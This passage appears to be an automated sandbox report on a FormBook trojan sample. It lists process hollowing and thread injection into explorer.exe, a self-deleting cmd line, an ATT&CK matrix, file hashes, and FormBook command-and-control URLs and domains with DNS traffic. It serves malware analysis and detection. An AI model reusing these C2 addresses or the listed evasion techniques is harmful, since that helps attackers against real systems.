          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Section loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Section loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\systray.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\systray.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Thread register set: target process: 3424
          Source: C:\Windows\SysWOW64\systray.exe; Thread register set: target process: 3424
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Section unmapped: C:\Windows\SysWOW64\systray.exe base address: 1C0000
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe; Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe; Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 401000
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe; Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: FFD008
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe; Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
          Source: C:\Windows\SysWOW64\systray.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
          Source: explorer.exe, 0000000C.00000000.735084373.0000000000AD8000.00000004.00000020.sdmp; Binary or memory string: ProgmanMD6
          Source: explorer.exe, 0000000C.00000000.735601535.0000000001080000.00000002.00000001.sdmp; Binary or memory string: Program Manager
          Source: explorer.exe, 0000000C.00000000.735601535.0000000001080000.00000002.00000001.sdmp; Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000C.00000000.735601535.0000000001080000.00000002.00000001.sdmp; Binary or memory string: Progman
          Source: explorer.exe, 0000000C.00000000.735601535.0000000001080000.00000002.00000001.sdmp; Binary or memory string: Progmanlock
          Source: explorer.exe, 0000000C.00000000.753363013.000000000A716000.00000004.00000001.sdmp; Binary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe; Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook

          Remote Access Functionality:

          Yara detected FormBook

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts 1 | Shared Modules 1 | Valid Accounts 1 | Valid Accounts 1 | Masquerading 1 | OS Credential Dumping | Security Software Discovery 121 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Access Token Manipulation 1 | Valid Accounts 1 | LSASS Memory | Process Discovery 2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Process Injection 812 | Access Token Manipulation 1 | Security Account Manager | Virtualization/Sandbox Evasion 31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Disable or Modify Tools 1 | NTDS | Application Window Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Virtualization/Sandbox Evasion 31 | LSA Secrets | Remote System Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Process Injection 812 | Cached Domain Credentials | System Information Discovery 112 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Deobfuscate/Decode Files or Information 1 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Hidden Files and Directories 1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
          Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Obfuscated Files or Information 2 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
          Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Software Packing 1 | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact

          Behavior Graph

          [Behavior graph, ID 432683; start date 10/06/2021; architecture WINDOWS; score 100. Process chain: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe (drops AddInProcess32.exe) -> AddInProcess32.exe (started) -> explorer.exe (injected) -> systray.exe (started) -> cmd.exe (started) -> conhost.exe (started).]

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label | Link
          SecuriteInfo.com.Trojan.Packed2.43183.29557.exe | 34% | Virustotal | | Browse
          SecuriteInfo.com.Trojan.Packed2.43183.29557.exe | 36% | ReversingLabs | ByteCode-MSIL.Trojan.Wacatac |
          SecuriteInfo.com.Trojan.Packed2.43183.29557.exe | 100% | Joe Sandbox ML | |

          Dropped Files

          Source | Detection | Scanner | Label | Link
          C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | 0% | Metadefender | | Browse
          C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | 0% | ReversingLabs | |

          Unpacked PE Files

          Source | Detection | Scanner | Label | Link | Download
          11.0.AddInProcess32.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
          11.2.AddInProcess32.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File

          Domains

          No Antivirus matches

          URLs


          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | 13.59.53.244 | true | false | | high
          granthamrobotics.com | 34.102.136.180 | true | false | | unknown
          www.stealthshop.net | 74.220.199.6 | true | false | | unknown
          www.mclpay.com | unknown | unknown | true | | unknown
          www.granthamrobotics.com | unknown | unknown | true | | unknown

                    Contacted URLs

                    Name | Malicious | Antivirus Detection | Reputation
                    http://www.granthamrobotics.com/sadn/?5jDxn=9rYPWNexEp&9r8=cvOZMLUYKOYUB2MIVs3brF1aeCykDgyLTnisf2vSTBUNQvDIkJgvRwpKMlOnwLgVr/YP | false | Avira URL Cloud: safe | unknown
                    www.roamallday.com/sadn/ | true | Avira URL Cloud: safe | low
                    http://www.mclpay.com/sadn/?9r8=DXfJxxxI+/4CaoDoAzC1V5G6SJQKNuW4mru3KXZlF9SJY6Uq4c9wctugrHKIzz2k7BKt&5jDxn=9rYPWNexEp | true | Avira URL Cloud: safe | unknown

                    URLs from Memory and Binaries


                                            Contacted IPs


                                            Public

IP | Domain | Country | ASN | ASN Name | Malicious
13.59.53.244 | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | United States | 16509 | AMAZON-02US | false
34.102.136.180 | granthamrobotics.com | United States | 15169 | GOOGLEUS | false

                                            General Information

                                            Joe Sandbox Version:32.0.0 Black Diamond
                                            Analysis ID:432683
                                            Start date:10.06.2021
                                            Start time:16:57:12
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 10m 11s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Sample file name:SecuriteInfo.com.Trojan.Packed2.43183.29557.7257 (renamed file extension from 7257 to exe)
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                            Number of analysed new started processes analysed:20
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:1
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winEXE@7/2@3/2
                                            EGA Information:Failed
                                            HDC Information:
                                            • Successful, ratio: 13.9% (good quality ratio 12.8%)
                                            • Quality average: 74.2%
                                            • Quality standard deviation: 30%
                                            HCA Information:
                                            • Successful, ratio: 97%
                                            • Number of executed functions: 126
                                            • Number of non-executed functions: 157
                                            Cookbook Comments:
                                            • Adjust boot time
                                            • Enable AMSI
                                            Warnings:
                                            • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                            • Excluded IPs from analysis (whitelisted): 104.42.151.234, 92.122.145.220, 142.250.180.196, 204.79.197.200, 13.107.21.200, 13.64.90.137, 20.50.102.62, 20.75.105.140, 20.54.26.129, 67.26.81.254, 8.238.27.126, 8.241.78.254, 8.241.78.126, 8.238.30.126, 20.82.210.154, 92.122.213.194, 92.122.213.247, 20.82.209.183
                                            • Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, eus2-consumerrp-displaycatalog-aks2aks-useast.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, www.google.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, www.bing.com, skypedataprdcolwus17.cloudapp.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed, report is missing behavior information
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • Report size getting too big, too many NtReadVirtualMemory calls found.

                                            Simulations

                                            Behavior and APIs

Time | Type | Description
16:58:06 | API Interceptor | 218x Sleep call for process: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe modified

                                            Joe Sandbox View / Context

                                            IPs


                                            Domains


                                            ASN


                                            JA3 Fingerprints

                                            No context

                                            Dropped Files


                                                                                    Created / dropped Files

                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe.log
                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):1402
                                                                                    Entropy (8bit):5.338819835253785
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:MLUE4K5E4Ks2E1qE4bE4K5AE4Kzr7K84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoesX3:MIHK5HKXE1qHbHK5AHKzvKviYHKhQnoe
                                                                                    MD5:F2152F0304453BCFB93E6D4F93C3F0DC
                                                                                    SHA1:DD69A4D7F9F9C8D97F1DF535BA3949E9325B5A2F
                                                                                    SHA-256:5A4D59CD30A1AF620B87602BC23A3F1EFEF792884053DAE6A89D1AC9AAD4A411
                                                                                    SHA-512:02402D9EAA2DF813F83A265C31D00048F84AD18AE23935B428062A9E09B173B13E93A3CACC6547277DA6F937BBC413B839620BA600144739DA37086E03DD8B4F
                                                                                    Malicious:true
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Co
                                                                                    C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe
                                                                                    File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):42080
                                                                                    Entropy (8bit):6.2125074198825105
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:gc3JOvwWj8Gpw0A67dOpRIMKJ9Yl6dnPU3SERztmbqCJstdMardz/JikPZ+QsPZw:g4JU8g17dl6Iq88MoBd7mFViqM5sL2
                                                                                    MD5:F2A47587431C466535F3C3D3427724BE
                                                                                    SHA1:90DF719241CE04828F0DD4D31D683F84790515FF
                                                                                    SHA-256:23F4A2CCDCE499C524CF43793FDA8E773D809514B5471C02FA5E68F0CDA7A10B
                                                                                    SHA-512:E9D0819478DDDA47763C7F5F617CD258D0FACBBBFFE0C7A965EDE9D0D884A6D7BB445820A3FD498B243BBD8BECBA146687B61421745E32B86272232C6F9E90D8
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Joe Sandbox View:
                                                                                    • Filename: SecuriteInfo.com.Trojan.GenericKD.37066764.6014.exe, Detection: malicious, Browse
                                                                                    • Filename: lueTCJ7lV4.exe, Detection: malicious, Browse
                                                                                    • Filename: ZwqvqceZYv.exe, Detection: malicious, Browse
                                                                                    • Filename: My First Game.exe, Detection: malicious, Browse
                                                                                    • Filename: SecuriteInfo.com.W32.MSIL_Kryptik.ANN.genEldorado.6306.exe, Detection: malicious, Browse
                                                                                    • Filename: 62c59ba0_by_Libranalysis.exe, Detection: malicious, Browse
                                                                                    • Filename: Payment-slip011002883864.exe, Detection: malicious, Browse
                                                                                    • Filename: Payment Copy#513.exe, Detection: malicious, Browse
                                                                                    • Filename: Payment-slip000898070.exe, Detection: malicious, Browse
                                                                                    • Filename: 47755769_by_Libranalysis.exe, Detection: malicious, Browse
                                                                                    • Filename: SecuriteInfo.com.Trojan.GenericKD.46273706.27055.exe, Detection: malicious, Browse
                                                                                    • Filename: RFQ# PC1746006.exe, Detection: malicious, Browse
                                                                                    • Filename: po.exe, Detection: malicious, Browse
                                                                                    • Filename: 0kTpSR8QiF.exe, Detection: malicious, Browse
                                                                                    • Filename: RFQ-EB200-PLOO1_Bidding.pdf.exe, Detection: malicious, Browse
                                                                                    • Filename: po.exe, Detection: malicious, Browse
                                                                                    • Filename: BID INSTRUCTIONSCOMMERCIAL.exe, Detection: malicious, Browse
                                                                                    • Filename: RFQ-IOCL-PP-IN-301.exe, Detection: malicious, Browse
                                                                                    • Filename: SecuriteInfo.com.Trojan.Agent.FGSF.21849.exe, Detection: malicious, Browse
                                                                                    • Filename: TT-SWIFT.exe, Detection: malicious, Browse
                                                                                    Reputation:moderate, very likely benign file

                                                                                    Static File Info

                                                                                    General

                                                                                    File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Entropy (8bit): 6.735718668413099
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                                    File name: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe
                                                                                    File size: 557568
                                                                                    MD5: 4e9095ceadd56bc68a99947ab929f691
                                                                                    SHA1: bce676ea49fb6709dc0e9a23df2e918e05b4074b
                                                                                    SHA256: 1fe427cfa805bbabdc371ae3f6ccea4088ca76e8b9fce9828a74885d72339020
                                                                                    SHA512: f0019d55c93ee2ca616ad53635592352ae313684291c5aa2bfba7130d13b964220d393a9867bc1e985b2b8f904cf8b8a210aeb571c140642f0eb0ee98cc67898
                                                                                    SSDEEP: 6144:mP2KJg5YoBA4cG+qw1y/lcCcfcgjXLSua0QxCiNLd7UXm7Ej2I++7dWS9WVKBlch:m1MA4cScHfc4euixCiZiXurSkV6y
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....B...................x............... ........@.. ....................................`................................

                                                                                    File Icon

                                                                                    Icon Hash: 00828e8e8686b000

                                                                                    Static PE Info

                                                                                    General

                                                                                    Entrypoint: 0x4897de
                                                                                    Entrypoint Section: .text
                                                                                    Digitally signed: false
                                                                                    Imagebase: 0x400000
                                                                                    Subsystem: windows gui
                                                                                    Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                    DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                                                                                    Time Stamp: 0x1FAF421A [Wed Nov 5 12:56:58 1986 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version: v4.0.30319
                                                                                    OS Version Major: 4
                                                                                    OS Version Minor: 0
                                                                                    File Version Major: 4
                                                                                    File Version Minor: 0
                                                                                    Subsystem Version Major: 4
                                                                                    Subsystem Version Minor: 0
                                                                                    Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                    Entrypoint Preview

                                                                                    Instruction
                                                                                    jmp dword ptr [00402000h]
                                                                                    add byte ptr [eax], al

                                                                                    Data Directories

                                                                                    Name                                  Virtual Address  Virtual Size  Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT          0x89790          0x4b          .text
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE        0x8a000          0x596         .rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC       0x8c000          0xc           .reloc
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                                                    Sections

                                                                                    Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
                                                                                    .text   0x2000           0x877e4       0x87800   False     0.627983740775   data       6.74662046366   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                    .rsrc   0x8a000          0x596         0x600     False     0.410807291667   data       4.04237592323   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .reloc  0x8c000          0xc           0x200     False     0.044921875      data       0.101910425663  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                    Resources

                                                                                    Name         RVA      Size   Type                                                                                 Language  Country
                                                                                    RT_VERSION   0x8a0a0  0x30c  data
                                                                                    RT_MANIFEST  0x8a3ac  0x1ea  XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                    Imports

                                                                                    DLL          Import
                                                                                    mscoree.dll  _CorExeMain

                                                                                    Version Infos

                                                                                    Description       Data
                                                                                    Translation       0x0000 0x04b0
                                                                                    LegalCopyright    Copyright 2019
                                                                                    Assembly Version  1.0.0.0
                                                                                    InternalName      Student.exe
                                                                                    FileVersion       1.0.0.0
                                                                                    CompanyName
                                                                                    LegalTrademarks
                                                                                    Comments
                                                                                    ProductName       Student
                                                                                    ProductVersion    1.0.0.0
                                                                                    FileDescription   Student
                                                                                    OriginalFilename  Student.exe

                                                                                    Network Behavior

                                                                                    Snort IDS Alerts

                                                                                    Timestamp                 Protocol  SID      Message                               Source Port  Dest Port  Source IP       Dest IP
                                                                                    06/10/21-16:59:51.470333  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49766        80         192.168.2.4     34.102.136.180
                                                                                    06/10/21-16:59:51.470333  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49766        80         192.168.2.4     34.102.136.180
                                                                                    06/10/21-16:59:51.470333  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49766        80         192.168.2.4     34.102.136.180
                                                                                    06/10/21-16:59:51.608156  TCP       1201     ATTACK-RESPONSES 403 Forbidden        80           49766      34.102.136.180  192.168.2.4

                                                                                    TCP Packets


                                                                                    UDP Packets

                                                                                    Jun 10, 2021 16:58:54.406909943 CEST5591653192.168.2.48.8.8.8
                                                                                    Jun 10, 2021 16:58:54.467139006 CEST53559168.8.8.8192.168.2.4
                                                                                    Jun 10, 2021 16:58:56.880532980 CEST5275253192.168.2.48.8.8.8
                                                                                    Jun 10, 2021 16:58:56.941210985 CEST53527528.8.8.8192.168.2.4
                                                                                    Jun 10, 2021 16:59:34.884417057 CEST6054253192.168.2.48.8.8.8
                                                                                    Jun 10, 2021 16:59:34.958528042 CEST53605428.8.8.8192.168.2.4
                                                                                    Jun 10, 2021 16:59:36.889569044 CEST6068953192.168.2.48.8.8.8
                                                                                    Jun 10, 2021 16:59:36.957350016 CEST53606898.8.8.8192.168.2.4
                                                                                    Jun 10, 2021 16:59:51.350280046 CEST6420653192.168.2.48.8.8.8
                                                                                    Jun 10, 2021 16:59:51.418663025 CEST53642068.8.8.8192.168.2.4
                                                                                    Jun 10, 2021 16:59:56.618190050 CEST5090453192.168.2.48.8.8.8
                                                                                    Jun 10, 2021 16:59:56.776873112 CEST53509048.8.8.8192.168.2.4
                                                                                    Jun 10, 2021 17:00:02.063884974 CEST5752553192.168.2.48.8.8.8
                                                                                    Jun 10, 2021 17:00:02.214797020 CEST53575258.8.8.8192.168.2.4

                                                                                    DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jun 10, 2021 16:59:51.350280046 CEST | 192.168.2.4 | 8.8.8.8 | 0x5b59 | Standard query (0) | www.granthamrobotics.com | A (IP address) | IN (0x0001)
Jun 10, 2021 16:59:56.618190050 CEST | 192.168.2.4 | 8.8.8.8 | 0x567 | Standard query (0) | www.mclpay.com | A (IP address) | IN (0x0001)
Jun 10, 2021 17:00:02.063884974 CEST | 192.168.2.4 | 8.8.8.8 | 0xd155 | Standard query (0) | www.stealthshop.net | A (IP address) | IN (0x0001)

                                                                                    DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jun 10, 2021 16:59:51.418663025 CEST | 8.8.8.8 | 192.168.2.4 | 0x5b59 | No error (0) | www.granthamrobotics.com | granthamrobotics.com | - | CNAME (Canonical name) | IN (0x0001)
Jun 10, 2021 16:59:51.418663025 CEST | 8.8.8.8 | 192.168.2.4 | 0x5b59 | No error (0) | granthamrobotics.com | - | 34.102.136.180 | A (IP address) | IN (0x0001)
Jun 10, 2021 16:59:56.776873112 CEST | 8.8.8.8 | 192.168.2.4 | 0x567 | No error (0) | www.mclpay.com | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | - | CNAME (Canonical name) | IN (0x0001)
Jun 10, 2021 16:59:56.776873112 CEST | 8.8.8.8 | 192.168.2.4 | 0x567 | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | - | 13.59.53.244 | A (IP address) | IN (0x0001)
Jun 10, 2021 16:59:56.776873112 CEST | 8.8.8.8 | 192.168.2.4 | 0x567 | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | - | 52.14.32.15 | A (IP address) | IN (0x0001)
Jun 10, 2021 16:59:56.776873112 CEST | 8.8.8.8 | 192.168.2.4 | 0x567 | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | - | 3.143.65.214 | A (IP address) | IN (0x0001)
